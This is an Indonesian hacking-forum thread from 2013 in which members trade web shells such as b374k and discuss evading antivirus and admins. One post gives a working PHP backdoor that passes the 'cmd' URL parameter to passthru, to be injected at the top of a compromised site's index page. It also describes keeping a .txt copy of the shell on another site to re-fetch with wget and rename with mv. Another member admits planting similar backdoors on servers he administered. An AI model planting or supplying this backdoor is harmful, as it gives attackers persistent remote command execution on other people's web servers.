Index Shell

**sarnobroken** · 05-24-2013, 03:10 AM

(05-24-2013, 02:32 AM)wine trochanter Wrote:
(05-24-2013, 01:12 AM)sarnobroken Wrote: mau donk shell nya om buat koleksi,,kedetek virus gag neh ???

heheh di google banyak kok om \m/

lagi ada b374k yang bisa jalan,,yang lain mampet om dhajar av kayak nya Smile

**wine trochanter** · 05-24-2013, 05:36 PM

(05-24-2013, 03:10 AM)sarnobroken Wrote:
(05-24-2013, 02:32 AM)wine trochanter Wrote:
(05-24-2013, 01:12 AM)sarnobroken Wrote: mau donk shell nya om buat koleksi,,kedetek virus gag neh ???

heheh di google banyak kok om \m/

lagi ada b374k yang bisa jalan,,yang lain mampet om dhajar av kayak nya

kesini aja
http://koecroet.wordpress.com/2013/01/19...ksi-virus/

**mas~jojoen** · 07-05-2013, 01:05 AM

kalo di php config nya shell_exec nya di Disable Functions gimana hayooo ... :?

**wine trochanter** · 07-05-2013, 01:37 AM

(07-05-2013, 01:05 AM)mas~jojoen Wrote: kalo di php config nya shell_exec nya di Disable Functions gimana hayooo ... :?

insya allah gk bisa Big Grin

**arfha** · 08-23-2013, 10:17 PM

Nice share om. Ane cba dlu yah? Smile

**arfha** · 08-23-2013, 10:22 PM

(03-26-2013, 05:12 PM)wine trochanter Wrote:
(03-26-2013, 12:13 AM)CrashZhack Wrote: om saya mau tanya.. itu kan upload shell dlu ke target ,, trus buat apa kita upload pake shell yang lain ?
kenapa ga langsung pake shell pertama aja ????

maaf om post saya yg diatas ga bermaksud ngejunk ,, tadi error ga bisa post , eh kok jadinya gitu -_-

edited by xsan

ohh ok saya coba menjawabnya
jadi knp kita taruh/mengedit index nya supaya shell kita tetap aman pak
misalkan anda taruh di direktori lain kalo admin nya sigap pasti dia akan hapus BD kita
jadi untuk mengakalinya kita harus punya kloningan shell di website lain yg berupa txt sehingga bisa kita pasnggil dengan menggunakan perintah wget dan mengganti txt menjadi php dg perintah mv

nah yg kita edit itu index nya, kita tambah kan seperti ini pada index bagian atas nya

<?php
if( !empty($_GET['cmd'])){
echo'<pre>';
passthru($_GET['cmd']);
echo'</pre>';
exit;
}
?>

tapi ingat kita harus tau apakah cgi nya udah di patch atau belum, kalo belum di patch bisa
kalo sudah di patch tar index nya yg error

Sebelum kita berpikir cgi nya udah d patch alngkah baiknya kita cba tambahin script

error_reporting(0);

Kalo script itu udah d tambahin dan error mgkin udah d patch Smile

**wine trochanter** · 08-23-2013, 10:26 PM

(08-23-2013, 10:17 PM)ArFha Wrote: Nice share om. Ane cba dlu yah?

jng ejek ane om, kan yg ngajarin sampean om Smile

**alkaaf** · 08-24-2013, 12:57 AM

nice om. jadi inget dulu waktu praktek industri jadi web admin. semuanya dikasih backdoor model ginian biar bisa nge-remote desktop buat download pake torrent Big Grin

tapi ketauan soalnya kelupaan ngasih "if" jadi tiap halaman dibuka keluar errornya =))

**kh4sh4** · 08-25-2013, 03:18 AM

langsung praktek pak, thanks

**Clound_Carbelius** · 08-25-2013, 02:15 PM

doktor satu ini memang serem sekali

izin nyimax